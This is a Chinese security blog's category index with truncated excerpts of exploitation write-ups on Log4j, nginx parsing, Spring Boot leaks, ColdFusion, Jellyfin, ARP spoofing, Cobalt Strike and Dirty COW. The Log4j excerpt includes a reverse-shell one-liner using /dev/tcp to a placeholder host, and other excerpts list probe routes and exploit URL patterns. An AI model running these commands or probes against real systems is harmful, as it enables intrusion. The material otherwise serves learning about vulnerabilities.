随笔分类 - 热门框架漏洞利用以及原理
1
摘要:Common Loophole Fingerprint Feature title="+ ID_VC_Welcome +" Search for Vcenter version Method 1 route: /sdk/vimServiceVersions.xml Method 2 By calli
阅读全文
摘要:ImageMagick The ImageMagick is the tool modify the picture. The function of ImageMagick is ELF file named magick. The vulnerability version of ImageMa
阅读全文
摘要:File Inclusion vulnerability In the PHP Configuration,"allow_url_include" wrapper by-default set to "Off" which instruct PHP not ot load remote HTTP o
阅读全文
摘要:碰瓷类型 X-Frame-Options 风险名称 点击劫持:X-Frame-Options响应头丢失 风险级别 中风险 风险描述 返回的响应头信息中没有包含x-frame-options头信息设置,点击劫持(ClickJacking)允许攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使
阅读全文
摘要:Port knock service: Knockd Service.This servcie hide the system open service by adding iptables rules dynamically.Using a customized series of serial
阅读全文
摘要:exploiting json serialization in .NET core 当使用特定的配置的时候,将在NewtonSoft JSON中会有json的反序列化漏洞。 更加具体化一些就是当 jsonserializationsettings 中的typenamehandling这个属性不是N
阅读全文
摘要:Form of expression The first is linpeas.sh in the process of detection found that there is a remote debugging of google chrome.the phenotype and analy
阅读全文
摘要:cors概述 发生跨域资源共享,web应用程序通过在http增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象 cors漏洞原理 cors请求分为两类,简单请求与非简单请求. 简单请求: 请求方式为GET,POST,HEAD三种之一 http头不
阅读全文
摘要:attention:1.需要找到没有定义的回溯值。2.确保存在merge,copy等赋值的函数能够向上污染。3.注意回溯的情况必须是在copy或复制函数内的参数,需要多少个__proto__是根据这种复制来判断的 像一些链条是没有类似copy之类的赋值函数。可以直接通过调用的数量来判断例如 opt.
阅读全文
摘要:主要利用chrome的<svg>和<p>标签一般来说 浏览器进行解析的时候,解析规则趋于xml解析若不是html解析 主要区别在于HTML中的某些标签在从文本反序列化时不能有子标签。例如<style>。如果查看HTML规范,我们会发现它的内容模型是Text。即使您尝试将元素放在<style>中,它也
阅读全文
摘要:nginx解析漏洞 漏洞原理 1、 由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.p
阅读全文
摘要:springboot信息泄露 可能泄漏的路由 /api-docs /v2/api-docs /swagger-ui.html /api.html /sw/swagger-ui.html /api/swagger-ui.html /template/swagger-ui.html /spring-se
阅读全文
摘要:漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 漏洞复现 ColdFusionPwn工具来生成POC:https://github.com/code
阅读全文
摘要:漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti
阅读全文
摘要:CGI introduction common gatewa interface/CGI describes a stardand for transferring data between server and client programs,allowing a client to reques
阅读全文
摘要:为了更好的了解jndi,必须了解背后的三个服务提供者 基于SPI接口和JNDI构建起了重要的联系 CORBA 分布式计算的概念中.ORB (object request broker) 表示用于分布式环境中远程调用的中间件.在客户端负责接管调用并请求服务端,服务端负责接收请求并将结果返回 一个简单的
阅读全文
摘要:jellyfin是一种自由的软件媒体系统。用于控制和管理媒体和流媒体。通过多个应用程序从专用服务器向终端用户设备提供媒体。 jellyfin<10.7.1版本 攻击者恶意构造请求将允许从jellyfin服务器的文件系统中读取文件。当是windows主机问题更加普遍 漏洞复现 fofa搜索jellyf
阅读全文
摘要:tips:arp的原理我也不再多赘述接下来介绍一个形成arp攻击的一个至关重要的概念--ip转发 ip转发 诱使靶机将凭证或者其他的东西发送给kali,我们需要启动kali的ip转发功能.只有这样能让kali将其他主机间的数据包转发给原有的接收方. 如果不开启ip转发功能,整个网络会出现拒绝服务的状
阅读全文
摘要:CS介绍 团队服务器 Cobalt Strike 分为客户端组件和服务器组件。服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数 据,并管理日志记录. 启动CS
阅读全文
摘要:漏洞概述 dirty cow漏洞是一种发生在写时复制的竞态条件产生的漏洞 写时复制(copy on write) 允许不同进程中的虚拟内存映射到相同物理内存页面的技术 三个重要流程 A:制作映射内存的副本 B:更新页表,是的虚拟内存指向新创建的物理内存 C 写入内存 tips:他们可以被其他线程中断
阅读全文
1
浙公网安备 33010602011771号